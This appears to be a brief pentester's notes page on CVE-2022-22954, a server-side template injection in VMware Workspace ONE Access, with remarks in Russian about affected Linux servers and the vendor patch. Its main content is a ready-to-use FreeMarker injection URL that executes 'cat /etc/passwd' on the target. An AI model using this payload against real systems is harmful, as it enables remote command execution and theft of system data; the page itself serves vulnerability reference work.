Workspace ONE Access

CVE-2022-22954: SSTI

/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

На Linux серверах. Вероятно связан с VMWare Horizon. Эксплоита нет, патч вышел, скачать не могу: https://kb.vmware.com/s/article/88438

Last updated 2 years ago

Was this helpful?